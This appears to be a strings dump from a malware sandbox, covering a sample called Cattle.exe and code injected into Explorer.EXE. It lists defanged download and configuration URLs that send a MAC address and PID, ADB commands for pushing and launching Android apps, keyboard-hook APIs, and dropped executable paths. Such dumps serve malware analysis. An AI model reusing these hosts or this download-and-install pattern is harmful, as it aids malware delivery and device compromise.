WINSPOOL.DRV
WINSPOOL.DRV
WS2_32.dll
WS2_32.dll
@WININET.DLL
@WININET.DLL
accKeyboardShortcut
accKeyboardShortcut
hhctrl.ocx
hhctrl.ocx
dwmapi.dll
dwmapi.dll
UxTheme.dll
UxTheme.dll
USER32.DLL
USER32.DLL
NRICHED20.DLL
NRICHED20.DLL
mscoree.dll
mscoree.dll
ekernel32.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
manufacturer:%s
manufacturer:%s
product name:%s
product name:%s
version:%s
version:%s
serial number:%s
serial number:%s
last wake-up event:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
uuid:x-xx-xxxx-xxxx
sku number:%s
sku number:%s
family:%s
family:%s
Cattle.exe_3444_rwx_00401000_001FB000:
t.hP4S
t.hP4S
t.hd:S
t.hd:S
tWSShW
tWSShW
tl9_ tgSSh
tl9_ tgSSh
u$SShe
u$SShe
@ SSHPWj
@ SSHPWj
j%XtL9E
j%XtL9E
tAHt.HHt
tAHt.HHt
t'SShl
t'SShl
SSSSh`
SSSSh`
FTCP
FTCP
FtPW
FtPW
SSh@B
SSh@B
CNotSupportedException
CNotSupportedException
CHttpFile
CHttpFile
hXXp://
hXXp://
kernel32.dll
kernel32.dll
%s (%s:%d)
%s (%s:%d)
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp
comctl32.dll
comctl32.dll
comdlg32.dll
comdlg32.dll
shell32.dll
shell32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filetxt.cpp
RegOpenKeyTransactedA
RegOpenKeyTransactedA
Advapi32.dll
Advapi32.dll
RegCreateKeyTransactedA
RegCreateKeyTransactedA
RegDeleteKeyTransactedA
RegDeleteKeyTransactedA
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl
ole32.dll
ole32.dll
RegDeleteKeyExA
RegDeleteKeyExA
user32.dll
user32.dll
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl
Afx:%p:%x:%p:%p:%p
Afx:%p:%x:%p:%p:%p
Afx:%p:%x
Afx:%p:%x
commctrl_DragListMsg
commctrl_DragListMsg
CCmdTarget
CCmdTarget
MFCLink_UrlPrefix
MFCLink_UrlPrefix
MFCLink_Url
MFCLink_Url
Shell32.dll
Shell32.dll
%s:%x:%x:%x:%x
%s:%x:%x:%x:%x
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\array_s.cpp
&%d %s
&%d %s
Hex={X,X,X}
Hex={X,X,X}
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp
ShowCmd
ShowCmd
%sMFCToolBar-%d%x
%sMFCToolBar-%d%x
%sMFCToolBar-%d
%sMFCToolBar-%d
%sMFCToolBarParameters
%sMFCToolBarParameters
TOOLBAR_RESETKEYBAORD
TOOLBAR_RESETKEYBAORD
CMDITabProxyWnd
CMDITabProxyWnd
CMDIChildWndEx
CMDIChildWndEx
CMDIFrameWndEx
CMDIFrameWndEx
KeyboardManager
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
%sDockingManager-%d
%sPane-%d%x
%sPane-%d%x
%sPane-%d
%sPane-%d
%c%d%c%s
%c%d%c%s
RGB(%d, %d, %d)
RGB(%d, %d, %d)
%sBasePane-%d%x
%sBasePane-%d%x
%sBasePane-%d
%sBasePane-%d
windows
windows
CMDIChildWnd
CMDIChildWnd
CMDIFrameWnd
CMDIFrameWnd
CMDIClientAreaWnd
CMDIClientAreaWnd
%sMDIClientArea-%d
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\viewcore.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%sMFCOutlookBar-%d
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
%sDockablePaneAdapter-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
CMFCToolBarsKeyboardPropertyPage
CMFCToolBarsKeyboardPropertyPage
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\olestrm.cpp
ENABLE_KEYS
ENABLE_KEYS
KEYS_MENU
KEYS_MENU
KEYS
KEYS
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
%sMFCTasksPane-%d
Visual C CRT: Not enough memory to complete call to strerror.
Visual C CRT: Not enough memory to complete call to strerror.
Broken pipe
Broken pipe
Inappropriate I/O control operation
Inappropriate I/O control operation
Operation not permitted
Operation not permitted
operator
operator
GetProcessWindowStation
GetProcessWindowStation
code %d bits %d->%d
code %d bits %d->%d
gen_codes: max_code %d
gen_codes: max_code %d
bl code -
bl code -
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
opt %lu(%lu) stat %lu(%lu) stored %lu lit %u dist %u
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
last_lit %u, last_dist %u, in %ld, out ~%ld(%ld%%)
-.zip
-.zip
inflate 1.1.3 Copyright 1995-1998 Mark Adler
inflate 1.1.3 Copyright 1995-1998 Mark Adler
-1.1.3
-1.1.3
1.1.3
1.1.3
%s%s%s
%s%s%s
Correct password required
Correct password required
1.2.8
1.2.8
zerr=%d Z_STREAM_END=%d total_out=%lu
zerr=%d Z_STREAM_END=%d total_out=%lu
entryCount=%d
entryCount=%d
x-xx-xxxx-xxxx
x-xx-xxxx-xxxx
XXXXXXXXXXX
XXXXXXXXXXX
%d(lo-client:%s%d)
%d(lo-client:%s%d)
%d(%s)
%d(%s)
%s%s/
%s%s/
cannot open '%s': %s
cannot open '%s': %s
cannot stat '%s': %s
cannot stat '%s': %s
skipping special file '%s'
skipping special file '%s'
cannot read '%s': %s
cannot read '%s': %s
error seeking in file '%s'
error seeking in file '%s'
could not allocate buffer for '%s'
could not allocate buffer for '%s'
error reading from file: '%s'
error reading from file: '%s'
file '%s' is not a valid zip file
file '%s' is not a valid zip file
AndroidManifest.xml
AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
file '%s' does not contain AndroidManifest.xml
failed to copy '%s' to '%s': %s
failed to copy '%s' to '%s': %s
%spush: %s -> %s
%spush: %s -> %s
%d file%s pushed. %d file%s skipped.
%d file%s pushed. %d file%s skipped.
error: %s
error: %s
%s/%s
%s/%s
hXXp://app.miaoxia8.com/driver/
hXXp://app.miaoxia8.com/driver/
c:\windows\temp
c:\windows\temp
%s\%s
%s\%s
DPInst.exe
DPInst.exe
\DPInst.exe
\DPInst.exe
xm32.zip
xm32.zip
xm64.zip
xm64.zip
ua32.zip
ua32.zip
ua64.zip
ua64.zip
:%d: %s
:%d: %s
0xX,
0xX,
can't find '%s' to install
can't find '%s' to install
can't install '%s' because it's not a file
can't install '%s' because it's not a file
shell:am start -n %s
shell:am start -n %s
shell:input keyevent 3
shell:input keyevent 3
/data/local/tmp/%s
/data/local/tmp/%s
/sdcard/tmp/%s
/sdcard/tmp/%s
--key
--key
host-serial:%s:%s
host-serial:%s:%s
%s:%s
%s:%s
ANDROID_ADB_SERVER_PORT
ANDROID_ADB_SERVER_PORT
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
adb: Env var ANDROID_ADB_SERVER_PORT must be a positive number. Got "%s"
VID:%s
VID:%s
Zip EOCD: expected >= %d bytes, found %d
Zip EOCD: expected >= %d bytes, found %d
EOCD(%d) comment(%d) exceeds len (%d)
EOCD(%d) comment(%d) exceeds len (%d)
Archive spanning not supported
Archive spanning not supported
protocol fault (status x x x x?!)
protocol fault (status x x x x?!)
host:transport:%s
host:transport:%s
transport-usb
transport-usb
transport-local
transport-local
transport-any
transport-any
host:%s
host:%s
TscServer.exe
TscServer.exe
Windows
Windows
PID:%s
PID:%s
127.0.0.1
127.0.0.1
taskkill /f /im %s
taskkill /f /im %s
%s\adb.ini
%s\adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
hXXp://cfg.app.soomeng.com/cfg/adb.ini
?MAC=%s&PID=%s
?MAC=%s&PID=%s
adb.ini
adb.ini
APPURL
APPURL
/TscServer.exe
/TscServer.exe
ShellRun%s/%s
ShellRun%s/%s
iphlpapi.dll
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
AllocateAndGetTcpExTableFromStack
InternalGetTcpTable2
InternalGetTcpTable2
transport
transport
XXXXXX
XXXXXX
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
%s\Connection
%s\Connection
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
c:\app\Call.pdb
c:\app\Call.pdb
.PAVCFileException@@
.PAVCFileException@@
.PAVCException@@
.PAVCException@@
.PAVCObject@@
.PAVCObject@@
.PAVCMemoryException@@
.PAVCMemoryException@@
.PAVCSimpleException@@
.PAVCSimpleException@@
.PAVCNotSupportedException@@
.PAVCNotSupportedException@@
.PAVCInvalidArgException@@
.PAVCInvalidArgException@@
.?AVCNotSupportedException@@
.?AVCNotSupportedException@@
.PAVCInternetException@@
.PAVCInternetException@@
.?AVCHttpFile@@
.?AVCHttpFile@@
.PAVCOleException@@
.PAVCOleException@@
.PAVCArchiveException@@
.PAVCArchiveException@@
.?AVCCmdTarget@@
.?AVCCmdTarget@@
.PAVCResourceException@@
.PAVCResourceException@@
.PAVCUserException@@
.PAVCUserException@@
.?AVCTestCmdUI@@
.?AVCTestCmdUI@@
.?AVCCmdUI@@
.?AVCCmdUI@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCAcceleratorKey@@
.?AVCMFCColorBarCmdUI@@
.?AVCMFCColorBarCmdUI@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AV?$CMap@KKV?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBD@@
.?AVCMFCToolBarCmdUI@@
.?AVCMFCToolBarCmdUI@@
.?AVCMDITabProxyWnd@@
.?AVCMDITabProxyWnd@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWndEx@@
.?AVCMDIChildWnd@@
.?AVCMDIChildWnd@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWndEx@@
.?AVCMDIFrameWnd@@
.?AVCMDIFrameWnd@@
.?AVCMFCCmdUsageCount@@
.?AVCMFCCmdUsageCount@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDHH@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CMap@V?$CStringT@DV?$StrTraitMFC@DV?$ChTraitsCRT@D@ATL@@@@@ATL@@PBDPAVCObList@@PAV3@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@
.?AVCMDIClientAreaWnd@@
.?AVCMDIClientAreaWnd@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonCmdUI@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCRibbonKeyTip@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCToolBarsKeyboardPropertyPage@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCTasksPaneToolBarCmdUI@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
.?AVCMFCAcceleratorKeyAssignCtrl@@
zcÃ
zcÃ
c:\windows\temp\Cattle.exe
c:\windows\temp\Cattle.exe
06/02/2011
06/02/2011
000000000000
000000000000
Keyboard
Keyboard
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
[MS_VM_CERT/SHA1/27d66596a61c48dd3dc7216fd715126e33f59ae7]
1000_1234
1000_1234
PeekNamedPipe
PeekNamedPipe
GetProcessHeap
GetProcessHeap
GetCPInfo
GetCPInfo
GetWindowsDirectoryA
GetWindowsDirectoryA
Reporte_Dispatch
Reporte_Dispatch
RegQueryInfoKeyA
RegQueryInfoKeyA
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegCreateKeyExA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
GetViewportOrgEx
GetViewportOrgEx
ScaleViewportExtEx
ScaleViewportExtEx
SetViewportExtEx
SetViewportExtEx
OffsetViewportOrgEx
OffsetViewportOrgEx
SetViewportOrgEx
SetViewportOrgEx
GetViewportExtEx
GetViewportExtEx
GdiplusShutdown
GdiplusShutdown
ShellExecuteA
ShellExecuteA
UrlUnescapeA
UrlUnescapeA
URLDownloadToFileA
URLDownloadToFileA
GetAsyncKeyState
GetAsyncKeyState
MapVirtualKeyA
MapVirtualKeyA
SetWindowsHookExA
SetWindowsHookExA
GetKeyState
GetKeyState
CreateDialogIndirectParamA
CreateDialogIndirectParamA
GetKeyNameTextA
GetKeyNameTextA
UnhookWindowsHookEx
UnhookWindowsHookEx
MapVirtualKeyExA
MapVirtualKeyExA
GetKeyboardLayout
GetKeyboardLayout
GetKeyboardState
GetKeyboardState
HttpQueryInfoA
HttpQueryInfoA
InternetCanonicalizeUrlA
InternetCanonicalizeUrlA
InternetCrackUrlA
InternetCrackUrlA
InternetOpenUrlA
InternetOpenUrlA
2;%SK
2;%SK
`#T##.#.WA3#-3&
`#T##.#.WA3#-3&
.QICN,-6[?-`#=#10$ F .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#
.QICN,-6[?-`#=#10$ F .t33?-W7P53R--33 #.51; #13 5;-[3-M?-36#M->- a051?-#3 ..#
$###$-1?
$###$-1?
2 (;%(10
2 (;%(10
$,0(,$($,000 ,$ $
$,0(,$($,000 ,$ $
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
.iLiw-Z
.iLiw-Z
41;.Hx
41;.Hx
,"G.Ar#_
,"G.Ar#_
.zCN,-6[(
.zCN,-6[(
@WININET.DLL
@WININET.DLL
accKeyboardShortcut
accKeyboardShortcut
hhctrl.ocx
hhctrl.ocx
KERNEL32.DLL
KERNEL32.DLL
dwmapi.dll
dwmapi.dll
UxTheme.dll
UxTheme.dll
USER32.DLL
USER32.DLL
NRICHED20.DLL
NRICHED20.DLL
mscoree.dll
mscoree.dll
ekernel32.dll
ekernel32.dll
- Attempt to initialize the CRT more than once.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- CRT not initialized
- floating point support not loaded
- floating point support not loaded
manufacturer:%s
manufacturer:%s
product name:%s
product name:%s
version:%s
version:%s
serial number:%s
serial number:%s
last wake-up event:%s
last wake-up event:%s
uuid:x-xx-xxxx-xxxx
uuid:x-xx-xxxx-xxxx
sku number:%s
sku number:%s
family:%s
family:%s
Cattle.exe_3444_rwx_10018000_0002F000:
%F*>#
%F*>#
kN]%X
kN]%X
: L.xx_
: L.xx_
Tf.rh
Tf.rh
%CTyN(
%CTyN(
.Qzpmz
.Qzpmz
Uexe
Uexe
.Ru-]
.Ru-]
BuFtp>
BuFtp>
.QZ`s
.QZ`s
Explorer.EXE_1572_rwx_00EF0000_00005000:
%WinDir%\HpE\wow64\rebuild.exe
%WinDir%\HpE\wow64\rebuild.exe
%Program Files%\tango3\tango3.exe
%Program Files%\tango3\tango3.exe
wmsvcrt
wmsvcrt
WinExec
WinExec
ShellExecuteExA
ShellExecuteExA
ShellExecuteExW
ShellExecuteExW
OpenWindowStationA
OpenWindowStationA
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
GetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
CloseWindowStation
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExA
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyA
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpEndRequestW
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeA
UrlUnescapeW
UrlUnescapeW
Explorer.EXE_1572_rwx_00FF0000_00004000:
%System%\LQdhJ\yYJSx.exe
%System%\LQdhJ\yYJSx.exe
wmsvcrt
wmsvcrt
WinExec
WinExec
ShellExecuteExA
ShellExecuteExA
ShellExecuteExW
ShellExecuteExW
OpenWindowStationA
OpenWindowStationA
OpenWindowStationW
OpenWindowStationW
SetProcessWindowStation
SetProcessWindowStation
GetProcessWindowStation
GetProcessWindowStation
CloseWindowStation
CloseWindowStation
EnumWindows
EnumWindows
EnumThreadWindows
EnumThreadWindows
EnumChildWindows
EnumChildWindows
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegEnumKeyExA
RegEnumKeyExA
RegEnumKeyExW
RegEnumKeyExW
RegDeleteKeyA
RegDeleteKeyA
RegDeleteKeyW
RegDeleteKeyW
RegCloseKey
RegCloseKey
HttpOpenRequestA
HttpOpenRequestA
HttpOpenRequestW
HttpOpenRequestW
HttpEndRequestA
HttpEndRequestA
HttpEndRequestW
HttpEndRequestW
HttpQueryInfoA
HttpQueryInfoA
HttpQueryInfoW
HttpQueryInfoW
UrlUnescapeA
UrlUnescapeA
UrlUnescapeW
UrlUnescapeW